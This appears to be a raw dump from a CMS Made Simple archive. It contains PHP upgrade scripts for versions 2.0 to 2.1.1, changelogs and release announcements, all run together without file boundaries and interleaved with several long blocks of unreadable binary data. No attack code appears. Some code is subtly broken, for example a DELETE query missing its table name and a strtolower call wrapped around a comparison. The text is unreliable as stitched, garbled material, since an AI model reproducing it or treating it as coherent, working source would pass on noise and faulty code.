            $gcblist[$gcb['htmlblob_id']] = $gcb;
        }
    }

    if( count($gcblist) ) {
        // process all of the additional owners, and sort them into an array of uids, one array for each gcb.
        $query = 'SELECT * FROM '.CMS_DB_PREFIX.'additional_htmlblob_users';
        $tmp = $db->GetArray($query);
        if( is_array($tmp) && count($tmp) ) {
            $users = array();
            foreach( $tmp as $row ) {
                $htmlblob_id = $row['htmlblob_id'];
                $uid = (int)$row['user_id'];
                if( $uid < 1 ) continue;
                if( !isset($gcblist[$htmlblob_id]) ) continue;
                if( $uid == $gcblist[$htmlblob_id]['owner'] ) continue;
                if( !isset($users[$htmlblob_id]) ) $users[$htmlblob_id] = array();
                $users[$htmlblob_id][] = (int)$row['user_id'];
            }
        }

        // now insert the additional editors directly into the database
        $sql3 = 'INSERT INTO '.CMS_DB_PREFIX.CmsLayoutTemplate::ADDUSERSTABLE.' (tpl_id, user_id) VALUES (?,?)';
        foreach( $gcblist as $htmlblob_id => $gcb ) {
            if( !isset($users[$htmlblob_id]) ) continue;
            foreach( $users[$htmlblob_id] as $add_uid ) {
                $db->Execute($sql3,array($gcb['template_id'],$add_uid));
            }
        }
    }
}
unset($gcblist,$tmp);

verbose_msg('dropping gcb related tables...');
$sqlarray = $dbdict->DropTableSQL(CMS_DB_PREFIX.'additional_htmlblob_users_seq');
$dbdict->ExecuteSQLArray($sqlarray);
$sqlarray = $dbdict->DropTableSQL(CMS_DB_PREFIX.'additional_htmlblob_users');
$dbdict->ExecuteSQLArray($sqlarray);
$sqlarray = $dbdict->DropTableSQL(CMS_DB_PREFIX.'htmlblobs_seq');
$dbdict->ExecuteSQLArray($sqlarray);
$sqlarray = $dbdict->DropTableSQL(CMS_DB_PREFIX.'htmlblobs');
$dbdict->ExecuteSQLArray($sqlarray);

verbose_msg('converting stylesheets');
$query = 'SELECT * FROM '.CMS_DB_PREFIX.'css';
$tmp = $db->GetArray($query);
if( is_array($tmp) && count($tmp) ) {
  $css_list = array();
  foreach( $tmp as $row ) {
      $new_name = $_fix_css_name($row['css_name']);
      if( $new_name != $row['css_name']) verbose_msg("Rename stylesheet ".$row['css_name']." to $new_name");
      try {
          $tmp = CmsLayoutStylesheet::load($new_name);
      }
      catch( \CmsLogicException $e ) {
          $css_id = $row['css_id'];
          $stylesheet = new CmsLayoutStylesheet();
          $stylesheet->set_name($new_name);
          $stylesheet->set_content($row['css_text']);
          $stylesheet->set_description('CMSMS Upgraded on '.$db->DbTimeStamp(time()));
          $stylesheet->set_media_types($row['media_type']);
          $stylesheet->set_media_query($row['media_query']);
          $stylesheet->save();

          $row['css_obj'] = $stylesheet;
          $csslist[$row['css_id']] = $row;
      }
  }
}
unset($tmp);

verbose_msg('converting page templates');
// todo: handle stylesheets that are orphaned
@ini_set('display_errors',1);
@error_reporting(E_ALL);


$tpl_query = 'SELECT * FROM '.CMS_DB_PREFIX.'templates';
$tpl_insert_query = 'INSERT INTO '.CMS_DB_PREFIX.CmsLayoutTemplate::TABLENAME.' (name,content,description,type_id,type_dflt,owner_id,created,modified) VALUES (?,?,?,?,?,?,UNIX_TIMESTAMP(),UNIX_TIMESTAMP())';
$css_assoc_query = 'SELECT * FROM '.CMS_DB_PREFIX.'css_assoc WHERE assoc_to_id = ? ORDER BY assoc_order ASC';
$tmp = $db->GetArray($tpl_query);
$template_list = array();
if( is_array($tmp) && count($tmp) ) {
    foreach( $tmp as $row ) {
        $row['template_name'] = $fix_template_name($row['template_name']);
        $is_default = (int) $row['default_template'];

        // create the design (one design per page template)
        $tpl_id = $row['template_id'];
        $design = new CmsLayoutCollection();
        $design->set_name($row['template_name']);
        $design->set_description('CMSMS Upgraded on '.$db->DbTimeStamp(time()));
        $design->set_default($is_default);
        $design->save(); // the design will now have an id.
        verbose_msg('created design '.$design->get_name());

        // create the template
        $db->Execute($tpl_insert_query,array($row['template_name'],$row['template_content'],'',$page_template_type->get_id(),
                                $is_default,1));
        $new_tpl_id = $db->Insert_ID();
        $design->add_template($new_tpl_id);
        $design->save(); // save the design again.

        $row['new_tpl_id'] = $new_tpl_id;
        $row['new_design_id'] = $design->get_id();
        $template_list[$tpl_id] = $row;
        verbose_msg('created template '.$row['template_name']);

        // get stylesheet(s) attached to this template
        // and associate them with the design.
        $associations = $db->GetArray($css_assoc_query,array($row['template_id']));
        if( is_array($associations) && count($associations) ) {
            foreach( $associations as $assoc ) {
                $css_id = $assoc['assoc_css_id'];
                if( !isset($csslist[$css_id]) ) continue;
                $design->add_stylesheet($csslist[$css_id]['css_obj']);
            }
            verbose_msg('associated '.count($associations).' stylesheets with the design');
            $design->save();
        }
    }
}
unset($tmp);

verbose_msg('adjusting pages');
$query = 'SELECT content_id,template_id,content_alias FROM '.CMS_DB_PREFIX.'content WHERE template_id > 0';
$uquery = 'UPDATE '.CMS_DB_PREFIX.'content SET template_id = ? WHERE content_id = ?';
$iquery = 'INSERT INTO '.CMS_DB_PREFIX.'content_props (content_id,type,prop_name,content,create_date,modified_date) VALUES (?,?,?,?,NOW(),NOW())';
$content_rows = $db->GetArray($query);
$contentops = ContentOperations::get_instance();
if( is_array($content_rows) && count($content_rows) ) {
    foreach( $content_rows as $row ) {
        if( $row['template_id'] < 1 ) continue;
        $content_id = $row['content_id'];

        $tpl_id = (int) $row['template_id'];
        if( !isset($template_list[$tpl_id]) ) {
            error_msg('ERROR: The page '.$row['content_alias'].' Refers to a template with id '.$tpl_id.' That was not found in the database');
            continue;
        }
        $tpl_row = $template_list[$tpl_id];
        if( !isset($tpl_row['new_tpl_id']) ) {
            error_msg("could not find map to new template for template $tpl_id on page $content_id");
            continue;
        }

        // because we create a new design on upgrade for each page template thre can be only one design
        $design_id = $tpl_row['new_design_id'];
        $tpl_id = $tpl_row['new_tpl_id'];

        $db->Execute($uquery,array($tpl_id,$content_id));
        $db->Execute($iquery,array($content_id,'string','design_id',$design_id));
        verbose_msg('adjusted page '.$row['content_alias']);
  }
}

verbose_msg('dropping old template tables');
$sqlarray = $dbdict->DropTableSQL(CMS_DB_PREFIX.'templates');
$dbdict->ExecuteSQLArray($sqlarray);
$sqlarray = $dbdict->DropTableSQL(CMS_DB_PREFIX.'templates_seq');
$dbdict->ExecuteSQLArray($sqlarray);
$sqlarray = $dbdict->DropTableSQL(CMS_DB_PREFIX.'css_assoc');
$dbdict->ExecuteSQLArray($sqlarray);
$sqlarray = $dbdict->DropTableSQL(CMS_DB_PREFIX.'css');
$dbdict->ExecuteSQLArray($sqlarray);
$sqlarray = $dbdict->DropTableSQL(CMS_DB_PREFIX.'css_seq');
$dbdict->ExecuteSQLArray($sqlarray);

verbose_msg('uninstalling theme manager');
$modops = ModuleOperations::get_instance();
$modops->UninstallModule('ThemeManager');

verbose_msg('upgrading cms_groups table');
$sqlarray = $dbdict->AddColumnSQL('`'.CMS_DB_PREFIX.'groups`','group_desc C(255)');
$dbdict->ExecuteSQLArray($sqlarray);

verbose_msg('Remove the CMSPrinting module from the database');
$query = 'DELETE FROM '.CMS_DB_PREFIX.'modules WHERE module_name = ?';
$db->Execute($query,array('CMSPrinting'));

verbose_msg('Creating print UDT');
$txt = <<<EOT
echo '<!-- print tag removed in CMS Made Simple 2.0.  -->';
EOT;
UserTagOperations::get_instance()->SetUserTag('print',$txt,'Stub function to replace the print plugin');

$sql = 'SELECT username FROM '.CMS_DB_PREFIX.'users WHERE user_id = 1';
$un = $db->GetOne($sql);
if( $un ) {
    // make sure that if we have a user with id=1 that this user is in the admin (gid=1) group
    // as 2.0 now does not magically check uid's just gid's for admin access.
    try {
        $sql = 'INSERT INTO '.CMS_DB_PREFIX.'user_groups (group_id,user_id) VALUES (1,1)';
        $db->Execute($sql);
    }
    catch( \Exception $e ) {
        // this can throw an exception, if the user is already in this group... let it.
    }
}

verbose_msg(ilang('reset_user_settings'));
$query = 'DELETE FROM '.CMS_DB_PREFIX.'userprefs WHERE preference = ?';
$db->Execute($query,array('admintheme'));
$db->Execute($query,array('collapse'));
$db->Execute($query,array('wysiwyg'));

verbose_msg(ilang('reset_site_preferences'));
$query = 'DELETE FROM '.CMS_DB_PREFIX.'WHERE sitepref_name = ?';
$db->Execute($query,array('logintheme'));

verbose_msg(ilang('queue_for_upgrade','CMSMailer'));
\ModuleOperations::get_instance()->QueueForInstall('CMSMailer');

verbose_msg(ilang('upgrading_schema',200));
$query = 'UPDATE '.CMS_DB_PREFIX.'version SET version = 200';
$db->Execute($query);

status_msg('done upgrades for 2.0');
?>
Version 2.0.1 - Adelaide
----------------------------------
Core - General
- Improved optimization in ContentOperations::SetAllHierarchyPositions.
- Fixed return type of ContentOperations::GetPageIdFromAlias().
- Help for the {cms_html_options} plugin.
- Change the default page template to use {Navigator}.
- Explicitly force $smarty->fetch() to create a new template, and therefore a new scope. Keep track of scopes in a stack.
- Change prototype to CMSModule::DoActionBase to pass in the current template object.
- SITENAME is now assigned as a Smarty global.
  (fixes some variable scope issues)
- Fix problem with changing content types.
- Fix problem with CmsLayoutTemplateQuery wrt the editable option, that generated an SQL error.
  (resolves problems where people have additional editor access to templates, but no other design manager permissions).
- Fix minor JavaScript errors in plugin (error checking).
- Fix problems where If assign was passed to a {content} tag, do not pass it to the module on a mact request.
- Implements the completely forgotten 403 exception stuff and the IsPermitted content method.
- Improve the cmsms_dirtyform jQuery plugin to support the unload handler and an onUnload callback.
- Fixed the jQuery page selector plugin when the current value points to an invalid page,  and fixes for asynchronous Ajax.
- Adds a globally available cms_busy() JavaScript function for the Admin.
- Fix problem with html entitites in email addresses in user settings.
- Fix problem with {content cssname=string} and quotes.
- Chaged cmsms plugins to use $smarty->getTemplateVars() instead of $smarty->get_template_vars() because of scope issues.
- Minor fix to {form_start} when not used in a module.
- Improved error handling for cms_stylesheet.  Now will generate a message in the admin log, and an html comment on error.
- Minor fixes for module provided content blocks for Content type pages.

CMSContentManager v1.0.1
- Fixes for changing content types.
- Adds a title for some contextual help if a template is not available for a content item.
- Clear any locks if an exception occurred while submitting a content item.
- Improvements to error handling with apply and preview.
- Content list now refreshes every 30 seconds to display up-to-date lock information.

DesignManager v1.0.1
- Clear the type_default flag when copying a template.
- Clear any locks if an exception occurred while submitting a template.
- Clear any locks if an exception occurred while submitting a stylesheet.
- Template and stylesheet lists now refresh every 30 seconds to display up-to-date lock information.
- Fixes for design exporting templates with protocol-less URLs in them.

MenuManager v1.50.1
- Changes to createSmartyTemplate calls (now use $smarty->get_template_parent()).

Navigator v1.0.1
- Changes to createSmartyTemplate calls (now use $smarty->get_template_parent()).
- Minor change to the help ($node->children_exist)

Search v1.50.1
- Changes to createSmartyTemplate calls (now use $smarty->get_template_parent()).

News v2.50.1
- Changes to createSmartyTemplate calls (now use $smarty->get_template_parent()).
- Fix problem with custom fields not being assigned in fesubmit.
- Fix minor problem with html entities in the detailtempalte parameter.

FileManager v1.5.1
- Fix minor problem with Smarty scope in the drop zone.
��V�r�H��W��F��'Q2��Uqf�.�vX��D*��l9�%F�\D�$����z������|9�x�i��j�C�%������wo��o?�,�&vj�^-����������O7'fS8yun���������Ii@!��E|Nզ�]��Cp>Շof݆W�*����s�H9&��P�!���Պ�9~�]u4[w=O�a�C����0AL�L�x��"[�D�e)��'�
7���l�=��фP���ki��Kƒ�9V�O^a�K�N�l7�l�?�%(%�	�qȞK��'�l������kϱ ��^
�I}O�E|aw
����������7�Q��R8#�����B6�s���ڹm��X�@��МH.���<��-ώ6߼�߆�97�sa�XR4B�!7�
�M��'AU�v�Ρgo��ʥ��^-��zXi5�J��o��{���QYS��ns����Aֻ#Jm�1����u�h����Jp9�������H�(y��2�5��XZiֈ-�N��9�e@{��ÚFm"��L
�H�R�o�q��"�]��a5���ABvJx�j��@H�
�}=�N+=ni�b<W�:
<E$+�:
��E�g�*Lڐ��Q,��D�Pu��h펧���`���s���YS���F�����AJ톧�0"UePs��*�bRš��`]n�����~6�4�V'}i�����!f���8cm!iLN�����/�حFCƨD�oJm	��.�f[��2��[tj%�ZnFU#"���#��~.��8��JV�/QϺ�i�`��+�_{a�Mx1%j�|�j��X$՞kL���M���`m�.
8$"��tjk��9�Ƨ�����˅�$J\Z¤���:��J��w�/Sȅ�Ig7E��(7F2�N�
�%�m�u̲�z�@Q$
�P�	TuG{s
��/�=�3�!u=�����Z��ZV}c*�e�(U�l�f/9�����>��@�]`*7�hz��{���ni]pX#�Y�������v�����m������S�Y
Announcing CMSMS 2.0.1 - Adelaide
----------------------

We knew that shortly after releasing 2.0, regardless of how many months we were in beta, we would be creating bug-fix releases.   This is because the number of users who actually use the system increase when you remove the 'beta' or 'release candidate' suffixes.  Therefore, more issues are reported that need to be fixed.  CMSMS 2.0.1 - Adelaide is the first of those bug fix releases.

The bugs fixed in this release are important to almost everybody, they will affect upgrading, modules, templates, and users.   Therefore, we encourage you to upgrade your CMSMS 2.0 sites as soon as possible.

Some of the issues fixed in this release include
- Template, Stylesheet, and Content Locking
  We fixed numerous page locking issues with respect to different browsers and handling of unloading pages and various things.
  We also changed the respective template, stylesheet, and content lists to automatically refresh every 30 seconds so that they will show your locks properly.  This will help to solve problems with people who keep multiple tabs open.

- Smarty Scope
  Numerous issues with respect to passing Smarty variables from parent templates to child templates were attacked and solved.

- The new page selector
  Issues related to the new page-selector jQuery plugin were resolved.

- Editing templates with restricted permissions
  We solved a few relatively minor issues which occurred when a user had only 'additional-editor' access to a template, but nothing more.

- Implement the missing 403 error handler page type.
  We re-merged some changes from the 1.11.13 release that did not make it into 2.0 with respect to handling 403 (permission denied) errors.

- More
There are lots of issues that were fixed in this release... you can find more details about them by viewing the changelog that is included with your install after upgrading.   You can also see the changelog before upgrading from within the installation assistant.

- Installation Assistant
The installation assistant also got a few minor tweaks for this release.  Most of those tweaks are just related to displaying more useful messages.

Supported Versions
--------
At this time, the CMSMS Dev team will support general issues in CMSMS 2.0 and CMSMS 2.0.1.
CMSMS 1.12.1 will be supported with respect to absolutely critical bugs, and security issues until September 6, 2016.

Thanks:
--------
We would like to thank all of the people that reported issues to us, and made it easy for us to reproduce and therefore fix the issues.  The Dev Team has worked hard to test, re-test and document each and every issue.
<?php

set_time_limit(90);
$dn = $destdir.'/admin/themes/default';
if( is_dir($dn) ) {
    status_msg('Making sure that default admin theme gets removed (it causes problems)');
    \__appbase\utils::rrmdir($dn);
}
status_msg('done upgrades for 2.0.1');
v2.0.1.1
--------
Fix to the $this->smarty magic method in the module class to resolve to the 
action template or the global smarty.
�\��� ��=O������pS���K���l-��?|��ii�\5-(�Q�l�IDH�yJ);���J�����2�Fh��J��h���v��|Ýw<KS�X�1N�����`�]�3�l��~>�8t����Q7z�1D�u�X�� 
I�<u�;�	d��u�����e�n������`Version 2.1 - Bahamas
----------------------------------
Core - General
- Minor performance tweaks to sample htaccess.txt
- Minor fix to the ProcessTemplateFromDatabase module API method.
- Improvements and re-factor the way headers are sent wrt caching
- Add a new method to the ModuleOperations class to allow a module to be within a namespace.
- Enhances the Group class.
- Enhancements and fixes to the cms_url class.
- Modified the $mod->smarty reference to be smarter... it is now deprecated.
- Fixes issue with https requests (#10697)
- Modifies The CmsLayoutTemplate class and CmsLayoutTemplateQuery to allow filtering on listable or non listable
  or setting a template as listable (default) or non listable
- Fixes a problem with styling of the login form if tasks must be run AND a module needs upgrading.
- Fixes to the cloning of templates in CmsLayoutTemplate
- Fixes problem with SetAllHierarchyPositions that cleared the entire cache instead of only the necessary part of it.
- Adds the unloadCancel handler to the lockManager jquery plugin.
- Moves version.php and include.php inside the lib directory so that they are easier to protect from unwanted direct access.
- Fixes to page alias tests when manually entering a page alias.
- Missing language strings are no longer output to Admin log, but to the debug log.
- Requests for modules that are not installed/enabled, or for invalid actions will now result in 404 errors.
- Fixed problem where restricted content editors could implicitly change the page alias.
- Improvements to the system information page, particularly the bbcode output.
- cms_init_editor, form_start, and cms_action_url plugins are no longer cachable.
- Adds the 'adminonly' option to the {content}, {content_image}, and {content_module} tags to allow only members of the 'Admin' group to manipulate the values of that block.
- Add a trivial check to the sitedown message to make sure that it is not empty.
- Minor fixes for PHP 7

MicroTiny v2.0.2
- Now add page hierarchy to autocomplete text when using the linker.
- Now use $smarty->CreateTemplate for clarity when compling the config template
- Now explicitly assign urls so that they do not get caced by smarty.
- Slightly tweak the default HTML content in the example tab.
- Updated tinymce to the latest 4.2.7 version, included the 'paste' plugin, and turned on 'paste_as_text'.
- Added the ability to enable the table plugin, now distribute the table plugin

CMSContentManager v1.0.2
- Fix problem with pagedefault metadata.
- Fixes for handling no listable templates for a design
- More work with locking.  With only one exception all locking and unlocking is initiated via javascript.
- Minor fix to copycontent

DesignManager v1.1
- Adds ability to toggle the listability of a template.
- Fixes problems with lost changes if there is a syntax error in the template.
- More work with locking.  With only one exception all locking and unlocking is initiated via javascript.

News v2.50.3
- Fixes minor issue with pagination in News admin console.
- Fix errors in the default form template.
- Fixed URL to long issues on redirection after adding/editing article.

Search v1.50.2
- Minor PHP7 fixes.

ModuleManager 2.0.1
- Minor fix to which modules could be uninstalled and deactivated.
��Z�r[G�}��Y[��7/j�#,����+#++���Ϳ�S��D�c""�fVee��^����O�|���7?�}���o}��7ol%�`r�ǻ����ˇwo���/��7��\�{��o߽���ӛ�~x~�=�`����'��?~x��[�~��7o��n+e*Y5��\��3������-d~������k��%M�VHbv؆隥�������l��^��~���ݵηP�Y�k���bIJt%V������l���wٌ ׺�����7z�;���a�%&����Vm�Dc���t:�ܬ�x����j~3��f�}O�9&K��6C�z>�l1�\i�m���!����Ɋ�`{�Lj)Yk��m��^���r�u�_�U}𙢶l��%g���WI�?����r���K]\����8��_|NI���Rz,ͦ�Z}u�qd�뵮w?/�ֺ�@w�3�z�5%
!Z�)E#�I �S:���X�[]���$]�I�3Z�m�:�i�)���.]l��N6^��C�zW�SE��$غ�g"^��w�'w�1p��8q�"��zWjE�K�O�>�S*�V�*�Kɑi���,�B!~���˻ͯ����;]�o�R�la���^$)��z�ݹ�]a_^��ܕm�.j���B���S㫞[�Ͳ���еGb[�`")y�G	Ej�.H�U��w�m�Oj\Ji.��^lM
0�R�dJ�qo���<*��?Q��m��E_'��i��)�^�K%��@���_L����^m�?�ܭf��-�3�i�FL 
��t�ٲg�CvB{��4W����n��ϓasH�9���Mk�1�
��FM;�`w�W����j3^>���S����fC�
t3>s�	�⻟&ڷ��/�{8�T�:ƪ�Ilמ��ʡ�,�z�&��HG�܀S�08`����9��q��`�Aʔ��0����\Z�G�<F���h_���6"��~[���Z��g�Y%W���B�rj��/�l3�__�n���`��Ĝ
Y�wv.v��Ǹ8��yV�5�P8��X�	q��ǒ�<�<�m��%7��k
.����W��K���1E��b�������w�\=t���1��)\E��%��	�j�s="�Ƽ"��|ҕ��w+9�,8/�LNU]�Ab��bo!d��s[��?�x��ss�n��,��5a���9���c�OQt�Q�A!Ħ	�V���T h�b���Ń�qΉ8YV��PsO�Ytu{�֗?�zv�x�����N�]p��-�b�J�S�����!-�.)� e
�H
6x)�V�ETka�KrضƔc��)8ί[��VD�H�C�I\#SD�q�B�Gм<*��v~pl%	�[6��Z��	1V�kS<n�(�b����j�vO�� jѻ�����՞�'4�6T�����b���c����{�!��3i KBCk*e0���T��Xa%�Ҝo'G
=�AgQ+c$����Dx�/��Ԟ�&R����!w�Z��BL@�©�פ���+��'z>����!���KCxq.����⾔�T{=l먹��#�����%XN[w	��`^�-Y�ޟ�^B�΍���YVZ,dH?<����)r��d�P1ڪ�8x�,K�fm0�꺉�4䣉ܟ�.�z�u�@�<�U�Z��\z��"m������j��ف6��	�X�>jPyp�	�@�/F�/z>[O��U���Pqp�0\�2�9�D����8Sd���m��+��@�	��4���
?,E2�?q���H��%k�n&�寳��o
�ƾ��+	,Ҩ�����>�|���:�صC�A�b�1������Sug�>t�~�o1 ��Nh�%'j�=\!DB
�;f=[�����F���Zy%�V��x|��}$��+Tn��Lp�-�
|��@~����W7|{>�-nL*����(���y]��
�x>��v��n�NΒ/,� ��d7>�,�0�ad4qh�g�R����
�y]��l����+���G6p�l
��r�B>-W/�'�Ҁ"�ޜ���$�Bp�~]���ݾ�?m�W|�}�M�t��:�
���2K2c
�{O�ײɣ#Ee�Tޚ����J0�6Z����lH���{"�3l�f�;�+N`�2ϖ R�ZŽ���^l6��\LĈ[AJn���y��7��w�\�~}ЪP�L0!^���l���&1Y�ߑR���X�)>V���}�@+=��HG�?��������4T�8�Ն"�d��ߘ���S�#�]��b-�<�p5!(�!x�������'�c�7$&�V��x�$4�W�����s�<��Չ\�YMU�/�6����$�h�I���k�r�7r^ݮ�����C,�0�
��}�Ԉ|6��p���'�m�4fX%�c�Ա���,6	�F��;8VpP/����Zc3l�69���3���3�v:MY=@���p�$����z���>�>�
P�Q�F���3QMk���ե���ƴ,�u�#TRp��Z|��CV�e=��&���>�
��̘b�z�L��p���Zk��p���v]1J�\��K3Q�n:��Wٖ;17��R,iı�@�Q�-�����'G'���j�����
6���c��F��0z�Yc��!���;xu���Ԅiʐ��u��톉��B��Znx>�6qQ�D��".�D��.V@���7�,����R�N�4&U0
4~��n��(�b���>�;V�Չ����1�WC
dݳP΋k�>������]4]iB��iY��q����F��"5��fi��f\�,�o�}��1��r%�Ϣl�ʩG^��&��V4B��.�8��]�����E�v�dZ�N�c�F�r�0����6LRl��aJ����@+vhTS��.�~=��-�d�&(�|��i�Qi�Ȧ�s͂��o.�.��ox�y2BD��R��Q0t���KUM�J��k�ܟ��M0M��4(�ɑ��\|�'n�T���

��uE�Ǎ�`C��#̗C�sr�h|�-㉾�bԩ=\��n�	KMF��������Ct�2��S�ȃ�PIUa�|�C(�\J�!��{LV3�,�:�v��K�17�t2��X�MTc:x��ђ&px�I�
:��eq$�O@���S��r�'k����'����Gb���2�W�D�3�?��q�(���;�57P`����`�T>��&pTm�V}k$�
q�R*b������tD�\D�چNuP�kN1�q��O�vv�nn@�"�a�B��n�0��q4'��	>!T�0���W���Y��d�����A�5�2X�����l7Vr�'HcÓ�ġarL���0)�;�`w�W<��Qn�iu�Z�l��e�kk
������=�z�Ѩ6�bƴ�m έp���|��B�ޮ�OQP�n�v�>P��6����Ⱥ�Iׂ̍:�
);I���2YؾgA����B���=���۹ۯ�*
���[lk/�-=����2Ƿ{���s.�1��X�X��D M|�?빦��”&��(�x��}��
J��s��[_�u3a�k��2��T��!�%<���j�`�ms�~�+�2�?(�0)������TZhS0?��V�8r�)C�$�z���;�O:�l�
��F��	p�1���P�ztJc�&��Ջ��1�l��y<%H=��I=�p��`:
���2 �1�����:;��~�o&�x���p�F>��(r��/�<�J��հU<�c���&H^�l<j�v#?}���v�����@�צ:ZE����n$n�Ώo�>�j�YX�n�Hh���^P'�_H�<Be���E
|�%�.I	m�~]p���>����CgZe�W�EC��M�.P��X�2aK��S^�3�&D�m�\KR��`����������\�@~�+<?php
status_msg('Upgrading schema for CMSMS 2.1');

//$gCms = cmsms();
$dbdict = NewDataDictionary($db);
$taboptarray = array('mysql' => 'TYPE=MyISAM');

$sqlarray = $dbdict->AddColumnSQL(CMS_DB_PREFIX.CmsLayoutTemplate::TABLENAME,'listable I1 DEFAULT 1');
$dbdict->ExecuteSQLArray($sqlarray);

verbose_msg(ilang('upgrading_schema',201));
$query = 'UPDATE '.CMS_DB_PREFIX.'version SET version = 201';
$db->Execute($query);
Version 2.1.1 - Nicholls Town
----------------------------------
Core - General
- Fix the template compiler so that content blocks can be placed within sub templates and detected with the {include} tag.
- Fix minor problem with checksum verification.
- Fix to the cms_cache_handler class
- Minor fix to SetAllPageHierarchies()
- Correct location where session was started in frontend displays.
- Fix the default option for {content_image}
- Modify the locker to use a beacon if supported, when unlocking.
- Fix missing permissions when a 1.12 site was upgraded (installation assistant)

CMSContentmanager v1.1
- Minor template changes in edit content wrt. locking
- Adds ability to clear content locks (admins can clear all locks, regular users can only clear their locks)

DesignManager v1.1.1
- Minor template changes in edit content wrt. locking
- Adds ability to clear template and css locks (admins can clear all locks, regular users can only clear their locks)
��W]SbI}�_�/��w�o�2�S5j���+�N'���rqwv�A����s�O��p~r����ep1�~r=8;��K�\�t�~����y�������=�7[�.N�ǽ_�/_��\��W_��v:w���?�O���\|����{��)Z��[a�Z�d=VM�r��xT�h�]���>�wC���ny�棿yޟ��6�}i��a�Q��MB*E0��Li��}�mJ?.g<��h:�q��d�j+XLu`|���=��;�t���b�w4�m�
d�J2X,T��� �r�)�|��'���p���1.x8�y��K(k�-z
f�b���1�=������e���U�mo�zt�(��D㘩��T)�Lp���=��>-ê�]a�u��d�� �RJA�$DZ9G4��R�Sqwb���(�ib�hB�[��U�V�۔��|���_�\l"XJ%U�5>�4�U4q���>�T�
a4i�sG�b����
�M���>Rư�y?mc������'��'7G<�q�
�J�;P+-��E
��#o�"-ӯ�X�a��v?ڑ�%I%��QOZ�CM��X��o����;Z!7i���_�q˼��x��טR��� R��\K9��ox�\;4�sS�4��R�5UvZt���(�7�6Z�ۡhE��~%���R�j=��8
!~�b�p����U�bi�5K�Y�J��c��6Z�����J���BM���AD/�m�@�>m6a^�6�$�zI~?�_	�VJkZg��B٨9�j�"BNls��Rm��"ζ��0jMjbQ�9U�ٽ���[�q�6��5��-��Ȇ���2a��CѽJ}�ɦ�;O�� D�M*8��
j2g@/Ӡ0�C�ߵĚ\4c	�Djp�Y|��tE�;�8W��BrV;��à}ǂ��cx�S��f��T���i_ˌ�i�g�&�\y���[mUF.�U!uE`�:�h��l��É��dS�z��.9���P�JM�e����3�U�s��j3�Ykc�1k��d����<>�|�����4D;r��F�q�U�bK`���3�^�uRͧ�����Z@U�
F�q�9I�RaG��9��D���c0_���$k��ca-�ldYʪ4n`�8K?��������(�~�f��S�T�΃�f��D0�U�i�8_��{���E{m	�C��|e����,E��9�j^�������vThis is an incremental release in the CMSMS 2.x series, addressing bugs and minor concerns.

Once again we battled with the locking, and for the most part we think we have it nailed.  We fixed some minor template errors in Design Manager and Content Manager thatoccurred when locking was disabled.  We also revised the locking JavaScript to use an asynchronous process that works asynchronously in almost all circumstances for common browsers.

The new locking JavaScript code is apparently not supported in Safari (particularly on iOS) and in Internet Explorer or Edge.   If your clients are primarily using these browsers, we suggest that you disable locking entirely and exercise caution so that users don't accidentally overwrite each other's work.

New functionality also allows non-admin users to explicitly, manually clear their locks, and for admin users (members of the admin group) to explicitly clear all locks.

We fixed a problem where permissions related to viewing and managing user settings and the user profile were not created in sites upgraded from 1.12.  If you are running some non-standard user groups you may need to modify the permissions associated with those groups to ensure they have the 'Manage My Account',  'Manage My Bookmarks' and 'Manage My Settings' permissions as is appropriate for your site.

Additionally, there were fixes to the Navigator module related to install and uninstall,  fixes to the {content_image} plugin, and fixes related to the initialization of the setting so that modules like FrontEndUsers would not generate a 403 error at the wrong time.

A complete list of the changes for CMSMS 2.1.1 is as usual available in the doc/CHANGELOG.txt file in the installation, and is available in the installation assistant.

We encourage you to upgrade your installations of CMSMS at your earliest convenience. 

Thank you and enjoy CMSMS.
<?php
status_msg('Upgrading schema for CMSMS 2.1.1');

//$gCms = cmsms();
$perms = array('Manage Designs','Manage My Settings','Manage My Account','Manage My Bookmarks');
$all_perms = array();
foreach( $perms as $one_perm ) {
    $permission = new CmsPermission();
    $permission->source = 'Core';
    $permission->name = $one_perm;
    $permission->text = $one_perm;
    $permission->save();
    $all_perms[$one_perm] = $permission;
}

$groups = Group::load_all();
foreach( $groups as $group ) {
    if( strtolower($group->name == 'designer') ) {
        $group->GrantPermission('Manage Designs');
    }
    $group->GrantPermission('Manage My Settings');
    $group->GrantPermission('Manage My Account');
    $group->GrantPermission('Manage My Bookmarks');
}Core - General
- Minor fix to missing lang string stuff
- Fixes to home page preferences
- API documentation fixes (minor)
- Fixes for ajax_content (the ajax routine behind the parent selector in edit content) to handle ordering inconsistencies.
- Remove die statement in is_email
- Minor fix to the relative_time modifier.
- Upgrade PHPMailer to 5.2.14

News v2.50.4
- Now all field definitions can be deleted 

ModuleManager v2.0.2
- Revamp module dependency calculations when installing a module.
- Minor fix for some notices in install and upgrade modules.
- Minor typo fixes.
- Minor fixes for PHP7

MenuManager  v1.50.2
- make sure that uninstall cleans up properly.

MicroTiny v2.0.3
- minor template fix.
- fixes for stylesheet overrides.
��}�v[G��{}��T�C��ʪ�Z�lw���Vdf$�$X(������8,/K#��{�����?��~�������7�b0���o�����~������_�1W�J����?����/~�q���޷�?���-�o>.~���w����׿~}��={ń���]��R�9kS��̻����ջ�Ok��W�]�XSͺ��
�S5�5*�l,�E=��'��p=��-����n-T�RVw�{鬓���꼆M����ݻ��\���}[���R��TJ�5w��+=�����/�eVwk�[��ʓ	-[�}5�sRZ�jK'��n5�����硑�i���k�NE�]�.D��F�h���՚�A_�(Sb
	��61(rγ)�E���;FnG.ƭA�s��֒�hI
	�5�P�N���Y�2���y�����Y[�?�r����y�����^l9��s�6Dց:s4���mz.huK����'o�~e6�p,��f��5���3hP�Q7VhI�,N=Y��nfO���-�ox����ju��]ߏ\�6ߒmt�Aƽۢ�R�N�g�1�k~�ҕ|��_hT��
��ygZ��ϵ�����`|�04^{��سn�%j�*a�{���Zec-5鐕IZ3�\iJW͑'o<�/�5��D�{��*��]-J�:�|����ǔr~����F�\�S��fd��Bp���ޑ�bm��Ɨ|���~uKG`G�1T�m��컭��o#��`#X\`�J��o�1��<���QD �q��M�����s@����N�s���T�C�gJ����Jh:n�T�b��|h��Q>�Ʊ��-���d��>%B���5�#i(x:<��tB�$��N0^���dz���J�j�cBo+��A*��c���!s��<�Œtn�[�[Ɇ'a�#[�AUC��{2�XtCO5��#o)���N�\�vЁ���L�뛡q��µ�@�}P�Y�9!��Ч$�?>
